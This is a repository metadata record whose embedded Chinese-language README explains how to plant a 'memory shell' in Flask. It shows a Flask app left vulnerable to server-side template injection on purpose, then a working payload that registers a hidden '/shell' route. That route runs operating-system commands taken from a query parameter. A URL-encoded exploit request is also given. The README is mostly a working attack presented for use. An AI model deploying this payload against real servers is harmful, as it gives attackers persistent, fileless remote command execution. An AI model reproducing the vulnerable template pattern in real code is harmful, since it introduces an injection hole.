{"id":13844193,"url":"https://github.com/iceyhexman/flask_memory_shell","last_synced_at":"2025-07-11T22:30:54.486Z","repository":{"id":112688532,"uuid":"351739467","full_name":"iceyhexman/flask_memory_shell","owner":"iceyhexman","description":"Flask 内存马","archived":false,"fork":false,"pushed_at":"2021-03-26T10:21:44.000Z","size":2,"stargazers_count":300,"open_issues_count":0,"forks_count":33,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-02-11T21:18:40.965Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/iceyhexman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-03-26T10:10:55.000Z","updated_at":"2024-01-13T04:30:38.000Z","dependencies_parsed_at":null,"dependency_job_id":"e1f1c319-5f67-4fab-af58-e44f919a8ed2","html_url":"https://github.com/iceyhexman/flask_memory_shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/iceyhexman/flask_memory_shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/iceyhexman","download_url":"https://codeload.github.com/iceyhexman/flask_memory_shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264909966,"owners_count":23682096,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:36.965Z","updated_at":"2025-07-11T22:30:54.241Z","avatar_url":"https://github.com/iceyhexman.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"# Flask 内存马\n\n\n\n一直遇到java打内存马的情景，想起来Flask也可以搞一个内存马试试。\n\n模拟一个存在SSTI的Flask环境\n\n```python\nfrom flask import Flask,request\nfrom flask import render_template_string\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n    return 'Hello World'\n\n\n@app.route('/test',methods=['GET', 'POST'])\ndef test():\n    template = '''\n        \u003cdiv class=\"center-content error\"\u003e\n            \u003ch1\u003eOops! That page doesn't exist.\u003c/h1\u003e\n            \u003ch3\u003e%s\u003c/h3\u003e\n        \u003c/div\u003e \n    ''' %(request.values.get('fxxk'))\n\n    return render_template_string(template)\n\n\nif __name__ == '__main__':\n    app.run()\n```\n\n使用app.add_url_rule动态添加一个路由，请求上下文在_request_ctx_stack的栈里\n\npayload:\n\n```\nurl_for.__globals__['__builtins__']['eval'](\"app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())\",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})\n```\n\n\n\n## 流程：\n\n打SSTI payload\n\n```\nhttp://127.0.0.1:5000/test?fxxk={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}\n```\n\n访问/shell内存马地址：\n\n![image-20210326182004878](https://static.hexlt.org/img/20210326182010.png)\n\n## 参考：\n\nFlask上下文管理机制: https://www.cnblogs.com/bigox/p/11652859.html\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ficeyhexman%2Fflask_memory_shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ficeyhexman%2Fflask_memory_shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ficeyhexman%2Fflask_memory_shell/lists"}